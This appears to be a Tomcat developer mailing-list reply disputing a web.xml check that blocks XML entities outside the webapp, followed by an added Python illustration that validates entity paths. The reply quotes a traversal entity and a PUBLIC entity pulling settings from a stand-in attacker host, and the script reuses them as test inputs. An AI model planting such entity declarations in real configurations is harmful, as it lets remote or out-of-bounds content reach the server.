> If this reference is in your web.xml file, then my suggestion is already
> being done.  To test it, try temporarily copying the settings.xml file
> into the WEB-INF directory and changing the relative URL appropriately.

Putting the file in WEB-INF works, even if I use ../settings, i.e.
directly in webapps/ROOT.

> I'd be -1 on removing the security check in 4.x/5.x.  Fixing 3.3.2 sounds
> like a good idea.

I'd be -1 on fixing 3.3.2, for many reasons:

- It will break all deployment strategies

- I'm still not sure it's a security problem, since nothing prevents
   you from changing to PUBLIC and going outside:

   <!ENTITY % settings SYSTEM "../../../settings.xml"> %settings;

to

   <!ENTITY % settings PUBLIC "hackme" "http://hackme.com/settings.xml"> %settings;

That's more than insecure, isn't it?

I took a look at the specs and didn't see anything preventing you from
having entities located outside the WEBAPP, so I feel it's a regression
and not a security feature.

At a minimum, in TC 4.x and 5.x, there should be a setting in web.xml
or server.xml to enable this behaviour, even if it's prevented by default.

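Added illustration, not code from this thread or from Tomcat: the containment decision a "stay inside the webapp" entity check makes for the three kinds of identifier discussed above (a relative SYSTEM path beside web.xml, one that climbs out with "../../../", and the PUBLIC/http variant), written in Python. The webapp path and the identifiers are constructed for the demo; resolving SYSTEM ids relative to WEB-INF and having no catalog for PUBLIC ids are assumptions about how the resolver is configured.

```python
import os
from urllib.parse import urlsplit

# Assumption: a SYSTEM id in web.xml is resolved relative to WEB-INF,
# where web.xml itself lives, before any containment check is made.
def canonical_target(webapp_root, system_id):
    """Resolve system_id against WEB-INF and canonicalise it so that '..'
    segments (and symlinks, when the path exists) are collapsed first."""
    base = os.path.join(webapp_root, "WEB-INF")
    return os.path.realpath(os.path.join(base, system_id))

def entity_allowed(webapp_root, system_id, public_id=None):
    """Return (allowed, detail). Only local files below webapp_root pass."""
    if public_id is not None:
        # Assumption: no catalog maps PUBLIC ids to local files, so a
        # PUBLIC declaration has nothing trustworthy to resolve to.
        return False, "PUBLIC identifier without a local catalog mapping"
    parts = urlsplit(system_id)
    if parts.scheme and parts.scheme.lower() != "file":
        return False, "remote scheme %r refused" % parts.scheme
    local = parts.path if parts.scheme else system_id
    target = canonical_target(webapp_root, local)
    root = os.path.realpath(webapp_root)
    if os.path.commonpath([root, target]) != root:
        return False, "resolves outside the webapp: " + target
    return True, target

# Constructed inputs: the declarations quoted in the thread plus two more.
WEBAPP = "/srv/tomcat/webapps/ROOT"
CASES = [
    ("settings.xml", None),                        # beside web.xml
    ("../settings.xml", None),                     # directly in webapps/ROOT
    ("../../../settings.xml", None),               # climbs out of the webapp
    ("http://hackme.com/settings.xml", "hackme"),  # the PUBLIC variant
    ("http://hackme.com/settings.xml", None),      # same URL as a SYSTEM id
    ("file:///opt/shared/settings.xml", None),     # local, but outside
]

def classify_cases():
    """Run every case and return {(system_id, public_id): allowed}."""
    return {(sid, pid): entity_allowed(WEBAPP, sid, pid)[0] for sid, pid in CASES}

if __name__ == "__main__":
    for sid, pid in CASES:
        ok, detail = entity_allowed(WEBAPP, sid, pid)
        print("%-36s %s  %s" % (sid, "allow " if ok else "refuse", detail))
```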